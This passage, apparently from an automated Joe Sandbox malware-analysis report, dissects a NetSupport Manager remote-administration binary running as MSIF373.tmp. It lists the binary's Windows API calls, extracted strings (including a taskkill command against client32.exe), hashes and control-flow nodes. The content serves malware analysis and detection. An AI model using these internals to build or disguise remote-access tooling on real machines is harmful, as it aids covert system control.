                                                                                          • String ID: $%s %s (%x)...$...Error or timeout, e=%d$...OK$/EC$/ec$8Nb$Back from Install$C:\Windows\Installer\$CICPLUGIN$CICPLUGIN [loggedonuser]$CICWClass$CloseApps32, prod=%d$Closing$Command Line: %s$Created main window %08x$Done:$Exit$Install Failed$NSM$NSMWClass$NSMWControl32$NSSWControl32$NetSupport Manager for Windows (32 bit) V14.10$OK$PCD$PCIAX.DLL$PCIRUNPLUGIN [loggedonuser]$PCIRemoteInstall$PCIVideoPlayer32$Quitting$Quitting %s (%x)...$Restart$Skipping rollback$Start, session=%d, user=%s$TNb$Undoing Install$V14.10$V15.10$boot$display.drv$enum msg wnd$enum msg wnd %x failed, e=%d$imhook.dll$module=%s$nslsp.dll$pNb$pciappctrl.dll$pciapp~1.dll$pcihooks.dll$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                          • API String ID: 3914842741-2849156311
                                                                                          • Opcode ID: 851d6adf3ea3f1f7af3823995f71b7fc605cee63d05f004d29c1c02293af8f3b
                                                                                          • Instruction ID: 668e8f4f0b074f1e8014cd8731561b234de1d1e67d186b61fdbfd452c624f249
                                                                                          • Opcode Fuzzy Hash: 851d6adf3ea3f1f7af3823995f71b7fc605cee63d05f004d29c1c02293af8f3b
                                                                                          • Instruction Fuzzy Hash: 4A2236719402699FDB30DF18CC49BAABBB5BB45704F0541EBE849A7341EB709E84CFA1

                                                                                          APIs
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 005D9972
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,00000000,00000000), ref: 005D9988
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 005D999B
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 005D99A4
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 005D9A48
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9A5C
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D9A7A
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9B49
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D9B7A
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9B88
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 005D9BB5
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9BDA
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D9BF1
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9BFF
                                                                                          • RegisterEventSourceW.ADVAPI32(00000000,PCIapp), ref: 005D9C4D
                                                                                          • GetComputerNameW.KERNEL32(?,?), ref: 005D9C75
                                                                                          • wsprintfW.USER32 ref: 005D9C97
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005D9D22
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005D9D3C
                                                                                          • Sleep.KERNELBASE(000001F4), ref: 005D9D47
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000E0), ref: 005D9D7B
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D9A88
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$QueryStatus$CloseHandleSleep$wsprintf$ComputerControlCreateDirectoryEventLocalNameObjectProcessRegisterSingleSourceStartSystemTimeWaitwvsprintf
                                                                                          • String ID: AllowStop ret %x$Attempt to start the service$CICWClass$Calling %s$NSMWClass$PCIapp$Restarted client32 service after %s$Service is stopped$Service started ok$Service stopped ok$StartService ok$Use old method$Waiting a while until stopped$\net$\taskkill.exe /F /IM client32.exe /IM runplugin.exe /IM runplugin64.exe$client32 control finished$close service$close service manager$crash$done taskkill$start
                                                                                          • API String ID: 1864760163-1400246591
                                                                                          • Opcode ID: 9346791d8106258d90c5d23b5561e272ba96a0882cb7c3b62001d0488aab1bb2
                                                                                          • Instruction ID: f435e31293ee450e6e08bb32856b6b81ed56eb9d73f0366c4dd6589739626136
                                                                                          • Opcode Fuzzy Hash: 9346791d8106258d90c5d23b5561e272ba96a0882cb7c3b62001d0488aab1bb2
                                                                                          • Instruction Fuzzy Hash: D2B10571A01225ABEB30DB54DC4AFEE7B65BB54704F0440A7F50AA7382DB709B85CF61
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,739F1CB0,0000001A,?), ref: 005D6F2C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileModuleName
                                                                                          • String ID: ??F$??I$@~c$AssistantName$AssistantURL$Home$Hyc$Hzc$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$\zc$product.dat$pzc$xzc
                                                                                          • API String ID: 514040917-984018515
                                                                                          • Opcode ID: 3e23fabc35bbd873b83eae995cb6acfd2c585e2fe731a69f5e7ee29e0a3170a3
                                                                                          • Instruction ID: a2ad6a39f6c052fac9572f62a71702839401deefd38288983ba5fc7e274cb4bc
                                                                                          • Opcode Fuzzy Hash: 3e23fabc35bbd873b83eae995cb6acfd2c585e2fe731a69f5e7ee29e0a3170a3
                                                                                          • Instruction Fuzzy Hash: C222F0B99043298BCB348F28DC95BB67BB1FB68304F50009BE84997351FB358E85CB91

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetPrivateProfileStringW.KERNEL32(boot,display.drv,0061A054,00640F98,00000400,system.ini), ref: 005DE0A5
                                                                                          • lstrcmpiW.KERNEL32(00640F98,shellscr.drv), ref: 005DE0B5
                                                                                          • GetModuleFileNameW.KERNEL32(00590000,?,00000100), ref: 005DE0F0
                                                                                          • GetLastError.KERNEL32 ref: 005DE0F6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastModuleNamePrivateProfileStringlstrcmpi
                                                                                          • String ID: NetSupport Manager for Windows (32 bit) V14.10$V14.10$V15.10$boot$display.drv$module=%s$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                          • API String ID: 1466566021-4233989162
                                                                                          • Opcode ID: 2b0e2bbe1ba418751d24879e6338ea849c06e2c2e837409ad202473294393e0f
                                                                                          • Instruction ID: 38c884e6b2a1d5daf440d13529726a78b54b9ad2af119d07c25922da8a0b82a8
                                                                                          • Opcode Fuzzy Hash: 2b0e2bbe1ba418751d24879e6338ea849c06e2c2e837409ad202473294393e0f
                                                                                          • Instruction Fuzzy Hash: 0C513C75A402128BCB34BF6C9C5B6693BB3FB95310F094667E5568B3D1F7704841CB92

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetShortPathNameW.KERNELBASE(?,0063C848,00000100), ref: 005D60A5
                                                                                          • GetLastError.KERNEL32 ref: 005D60AF
                                                                                            • Part of subcall function 005D5690: GetModuleHandleW.KERNEL32(kernel32,GetLongPathNameW), ref: 005D56E4
                                                                                            • Part of subcall function 005D5690: GetProcAddress.KERNEL32(00000000), ref: 005D56EB
                                                                                            • Part of subcall function 005D5690: GetLongPathNameW.KERNELBASE(?,?,00000104), ref: 005D56FC
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • wsprintfW.USER32 ref: 005D610B
                                                                                          • MessageBoxW.USER32(00000000,?,NetSupport Manager for Windows (32 bit) V14.10,00000000), ref: 005D6124
                                                                                          • SetCurrentDirectoryW.KERNELBASE(C:\Windows\Installer\), ref: 005D6230
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$NamePath$AddressCurrentDirectoryErrorHandleLastLocalLongMessageModuleProcShortTimewvsprintf
                                                                                          • String ID: C:\Windows\Installer\$Fatal Error, cannot continuemodule=<%s>, e1=%d, path=<%s>, e2=%d$IKS.LIC$NST.LIC$NSW.LIC$NetSupport Manager for Windows (32 bit) V14.10$longpath=%s$path=%s
                                                                                          • API String ID: 791442131-2982756972
                                                                                          • Opcode ID: 7db5a8becfbe1f6d772f58dd8ca3d71fa037155ab4c84c88d53ec201f49692fc
                                                                                          • Instruction ID: 318456a2a5810e3a529cda34e3bd9757de0aa855f1dcf701ed9cb3180ea0c57d
                                                                                          • Opcode Fuzzy Hash: 7db5a8becfbe1f6d772f58dd8ca3d71fa037155ab4c84c88d53ec201f49692fc
                                                                                          • Instruction Fuzzy Hash: BE71F536A402029ACB306F6C9C2BB763BA2FF55765F440457F806DB392F7748942C7A1
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,0000000C,00000001,00000080,00000000,00000000,00000109,00000109), ref: 00605BFD
                                                                                          • CreateFileW.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 00605C36
                                                                                          • GetLastError.KERNEL32 ref: 00605C5A
                                                                                          • GetFileType.KERNEL32(005B06CD), ref: 00605C79
                                                                                          • GetLastError.KERNEL32 ref: 00605C9E
                                                                                          • CloseHandle.KERNEL32(005B06CD), ref: 00605CB0
                                                                                          • CloseHandle.KERNEL32(005B06CD), ref: 00606067
                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000001,00000000), ref: 00606087
                                                                                          • GetLastError.KERNEL32 ref: 00606091
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CreateErrorLast$CloseHandle$Type
                                                                                          • String ID: @$H
                                                                                          • API String ID: 352418905-104103126
                                                                                          • Opcode ID: ae5c543edc216eb033c58a464c3a72abf9a3987210c7532ee152ff75bdd35cab
                                                                                          • Instruction ID: cd6bcf7954b54379b9acc36d3a4ccec031bdc522e617f3526e2870a2f1b47630
                                                                                          • Opcode Fuzzy Hash: ae5c543edc216eb033c58a464c3a72abf9a3987210c7532ee152ff75bdd35cab
                                                                                          • Instruction Fuzzy Hash: B232013198068A9BDF298F54C849BEF7FB2EF41304F244629E5A2E62E1D3758E41CF51

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005DF3A2
                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 005DF3C5
                                                                                          • RegQueryValueExW.ADVAPI32(00000000,Log,00000000,?,?,?), ref: 005DF3F5
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 005DF413
                                                                                          • LeaveCriticalSection.KERNEL32(0064250C), ref: 005DF428
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCriticalLeaveOpenQuerySectionValuewsprintf
                                                                                          • String ID: @$Log$SOFTWARE\Productive Computer Insight\%s$winst32$winstall
                                                                                          • API String ID: 2277609062-2172721721

                                                                                          Control-flow Graph
                                                                                          control_flow_graph 1795 5c5a70-5c5a8e call 5b0040 call 5c5120 1799 5c5a93-5c5aa2 1795->1799 1800 5c5aa9-5c5ab0 1799->1800 1801 5c5aa4-5c5aa7 1799->1801 1802 5c5ab8-5c5abf 1800->1802 1803 5c5ab2-5c5ab6 1800->1803 1801->1800 1804 5c5ac7-5c5ada WaitForMultipleObjects 1802->1804 1805 5c5ac1-5c5ac5 1802->1805 1803->1802 1806 5c5adc 1804->1806 1807 5c5b4a-5c5b4c 1804->1807 1805->1804 1810 5c5ae0-5c5af4 WaitForSingleObject 1806->1810 1808 5c5b4e-5c5b51 1807->1808 1809 5c5b95-5c5ba3 1807->1809 1811 5c5b82-5c5b85 1808->1811 1812 5c5b53-5c5b7f Sleep GetCurrentProcess TerminateProcess 1808->1812 1813 5c5af6-5c5b00 call 5c59d0 1810->1813 1814 5c5b02-5c5b1e ResetEvent call 5c55b0 1810->1814 1811->1809 1816 5c5b87-5c5b92 call 5c55b0 1811->1816 1813->1814 1821 5c5b29-5c5b43 SetEvent WaitForMultipleObjects 1814->1821 1822 5c5b20-5c5b26 call 5c59d0 1814->1822 1816->1809 1821->1810 1825 5c5b45 1821->1825 1822->1821 1825->1807
                                                                                          APIs
                                                                                            • Part of subcall function 005C5120: GetCurrentProcess.KERNEL32 ref: 005C513C
                                                                                            • Part of subcall function 005C5120: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSIF373.tmp,00000104), ref: 005C515A
                                                                                            • Part of subcall function 005C5120: WideCharToMultiByte.KERNEL32(00000000,00000000,C:\Windows\Installer\MSIF373.tmp,000000FF,?,00000104,006199F4,00000000), ref: 005C51E4
                                                                                          • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 005C5AD6
                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 005C5AEC
                                                                                          • ResetEvent.KERNEL32(?), ref: 005C5B08
                                                                                          • SetEvent.KERNEL32(?), ref: 005C5B30
                                                                                          • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 005C5B3F
                                                                                          • Sleep.KERNEL32(0000AFC8), ref: 005C5B59
                                                                                          • GetCurrentProcess.KERNEL32(000000FE), ref: 005C5B64
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 005C5B6B
                                                                                            • Part of subcall function 005C55B0: GetTickCount.KERNEL32 ref: 005C5618
                                                                                          Similarity
                                                                                          • API ID: ProcessWait$CurrentEventMultipleObjects$ByteCharCountFileModuleMultiNameObjectResetSingleSleepTerminateTickWide
                                                                                          • String ID: MiniDump
                                                                                          • API String ID: 2601538400-2840755058
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(kernel32,GetLongPathNameW), ref: 005D56E4
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005D56EB
                                                                                          • GetLongPathNameW.KERNELBASE(?,?,00000104), ref: 005D56FC
                                                                                          Similarity
                                                                                          • API ID: AddressHandleLongModuleNamePathProc
                                                                                          • String ID: GetLongPathNameW$kernel32
                                                                                          • API String ID: 1057403391-1414249016
                                                                                          Strings
                                                                                          • %04d-%02d-%02d %02d:%02d:%02d.%03d , xrefs: 005DF097
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d
                                                                                          • API String ID: 0-2448528332
                                                                                          APIs
                                                                                            • Part of subcall function 005F92EA: EnterCriticalSection.KERNEL32(?,?,?,005F2AA8,0000000D,?,005B97EE,00000000,?,?), ref: 005F9314
                                                                                          • DecodePointer.KERNEL32(00632FA8,00000020,005ECC48,?,00000001,00000000,?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D), ref: 005ECB2B
                                                                                          • DecodePointer.KERNEL32(?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005ECB3C
                                                                                            • Part of subcall function 005F299E: EncodePointer.KERNEL32(00000000,005FAD09,00642898,00000314,00000000,?,?,?,?,?,005EF35C,00642898,Microsoft Visual C++ Runtime Library,00012010), ref: 005F29A0
                                                                                          • DecodePointer.KERNEL32(-00000004,?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005ECB62
                                                                                          • DecodePointer.KERNEL32(?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005ECB75
                                                                                          • DecodePointer.KERNEL32(?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005ECB7F
                                                                                          Similarity
                                                                                          • API ID: Pointer$Decode$CriticalEncodeEnterSection
                                                                                          • String ID:
                                                                                          • API String ID: 2427772772-0
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(000001F4), ref: 005C5BC4
                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000032), ref: 005C5BE0
                                                                                          • CloseHandle.KERNELBASE(000001F4), ref: 005C5BFC
                                                                                          • CloseHandle.KERNEL32(000001FC), ref: 005C5C10
                                                                                          • CloseHandle.KERNEL32 ref: 005C5C19
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$EventObjectSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 2857295742-0
                                                                                          APIs
                                                                                          • SetCurrentDirectoryW.KERNELBASE(C:\Windows\Installer\), ref: 005D6230
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory
                                                                                          • String ID: C:\Windows\Installer\$NSW.LIC$longpath=%s
                                                                                          • API String ID: 1611563598-2863773485
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 005C513C
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSIF373.tmp,00000104), ref: 005C515A
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,C:\Windows\Installer\MSIF373.tmp,000000FF,?,00000104,006199F4,00000000), ref: 005C51E4
                                                                                          Similarity
                                                                                          • API ID: ByteCharCurrentFileModuleMultiNameProcessWide
                                                                                          • String ID: C:\Windows\Installer\MSIF373.tmp
                                                                                          • API String ID: 3257813942-2592894044
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNELBASE(?,client32u.ini,?,005EC0D4,?,005BEA14), ref: 005EC078
                                                                                          • GetLastError.KERNEL32(?,005EC0D4,?,005BEA14), ref: 005EC083
                                                                                          Similarity
                                                                                          • API ID: AttributesErrorFileLast
                                                                                          • String ID: client32u.ini
                                                                                          • API String ID: 1799206407-403288815
                                                                                          APIs
                                                                                          • GetStartupInfoW.KERNEL32(?,00633048,00000058), ref: 005ED376
                                                                                          • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 005ED38B
                                                                                          • GetCommandLineW.KERNEL32 ref: 005ED415
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CommandHeapInfoInformationLineStartup
                                                                                          • String ID:
                                                                                          • API String ID: 4259286974-0
                                                                                          APIs
                                                                                            • Part of subcall function 005B97D0: wsprintfW.USER32 ref: 005B9804
                                                                                          • LoadLibraryW.KERNELBASE(psapi.dll,?,0062F7C0,?), ref: 00617FA5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoadwsprintf
                                                                                          • String ID: psapi.dll
                                                                                          • API String ID: 2341783205-80456845
                                                                                          APIs
                                                                                          • DeleteFileW.KERNELBASE(?,?,005E4C9F,?,?,?,?,?), ref: 005ED0A4
                                                                                          • GetLastError.KERNEL32(?,005E4C9F,?,?,?,?,?), ref: 005ED0AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 2018770650-0
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                            • Part of subcall function 005EF21F: GetModuleFileNameW.KERNEL32(00000000,006428CA,00000104,00000001,?,00000000), ref: 005EF2BB
                                                                                            • Part of subcall function 005EC94C: ExitProcess.KERNEL32 ref: 005EC95D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateExitFileHeapModuleNameProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1715456479-0
                                                                                          APIs
                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,005ED3DF), ref: 005EE986
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
